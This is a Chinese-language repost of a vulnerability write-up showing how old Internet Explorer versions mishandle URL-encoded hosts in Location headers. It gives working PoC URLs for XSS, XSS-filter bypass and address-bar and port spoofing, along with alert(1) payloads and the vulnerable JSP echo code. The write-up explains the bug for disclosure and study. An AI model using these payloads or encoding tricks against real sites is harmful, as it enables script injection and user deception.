由于IE对URL编码问题处理不当带来的XSS的PoC
来源:互联网 发布:硬盘坏了恢复数据 编辑:程序博客网 时间:2024/06/05 09:48
参考:
http://blog.bentkowski.info/2015/04/xss-via-host-header-cse.html
https://web.archive.org/web/20131107024350/http://blackfan.ru/
Source
RequestURI: <%= request.getRequestURI() %>
Host: <%= request.getServerName() %>
Port: <%= request.getLocalPort() %>
PoC (all versions IE 5.5 - 10.0 are affected):
XSS via Request-Path + XSS filter bypass + URLencode bypass + Address Bar Spoofing
http://blackfan.ru:8080/x?r=http://blackfan.ru/<img/src='x'onerror=alert(1)>/%252e%252e/%252e%252e/
XSS via Host header + XSS filter bypass
http://blackfan.ru:8080/x?r=http://blackfan.ru%252F<img%252Fsrc='x'onerror=alert(1)>%252F.%252e%252F.%252e%252F%253F%2523
Port Spoofing
http://blackfan.ru:8080/x?r=http://www.microsoft.com%253A11/ru-ru/default.aspx
http://blackfan.ru:8080/x?r=http://www.oracle.com%253A31337%252Findex.html%253F
Description
Incorrect handling of url-encoded host in Location-header
Example
Location-header:
http://%77%77%77%2E%6D%69%63%72%6F%73%6F%66%74%2E%63%6F%6D/test
Original Host
%77%77%77%2E%6D%69%63%72%6F%73%6F%66%74%2E%63%6F%6D
Decoding
www.microsoft.com
Overlaying with the original
www.microsoft.com+%77%77%77%2E%6D%69%63%72%6F%73%6F%66%74%2E%63%6F%6D =www.microsoft.com9%63%72%6F%73%6F%66%74%2E%63%6F%6D
注:www.microsoft.com
和%77%77%77%2E%6D%6
的长度是一样的。关于具体的叠加方法,参考这张图:
it appears that IE does some odd overlaying of the path in its URL-encoded and URL-decoded form.
➜ ~/GitProjects python -c "print len('%77%77%77%2E%6D%6');print len('www.microsoft.com')"1717
Result
http://www.microsoft.com9crosoft.com/test
XSS via Host Example
Location: http://example.com%2F<xss>%2F%2E%2E%2F%3F%23
Decoding:
example.com/<xss>/../?#
Overlaying:
example.com/<xss>/../?#2E%2E%2F%3F%23
Result Request:
GET /<xss>/../?#2E%2E%2F%3F%23 HTTP/1.1Host: example.com/<xss>/../?#
Port Spoofing Example:
Location: http://example.com%3A80
Decoding:
example.com:80
Overlaying:
example.com:80+example.com%3A80=example.com:8080
Address Bar:
example.com:8080
- 由于IE对URL编码问题处理不当带来的XSS的PoC
- 解决POC脚本对多种URL的自适应问题
- android中,由于图像处理不当而引起的OOM问题及其解决方案(一)
- android中,由于图像处理不当而引起的OOM问题及其解决方案(二)
- 不当使用memset函数带来的麻烦问题
- IE是怎么处理meta steam的编码的 && 那100+个xss
- URL的编码处理
- js对URL的处理问题
- iOS开发 URL编码之对特殊符号的处理
- IE cache缓存 所带来的问题
- IE cache缓存 所带来的问题
- JS对URL的编码
- SELinux对网站目录权限控制的不当的问题
- [PoC]某B2B网站的一个反射型XSS漏洞
- Python编码带来的一些问题
- tomcat版本升级带来的编码问题
- Linux驱动注册过程失败处理不当引起的问题
- 创建HTML文件保存由于编码问题导致内容无法显示的处理办法
- Zookeeper实例原生API--异步获取子节点列表
- Class 装载系统
- Java对象作用域
- mysql安装jdbc驱动
- 揭露动画ViewAnimationUtils.createCircularReveal()
- 由于IE对URL编码问题处理不当带来的XSS的PoC
- 计算机视觉资料
- Restful
- Java反射
- Zookeeper实例原生API--同步获取节点数据
- [HAOI2017]新型城市化
- 简单支持unity同一个项目多开的方式
- 状态栏、沉浸式状态栏
- 限制容器对内存的使用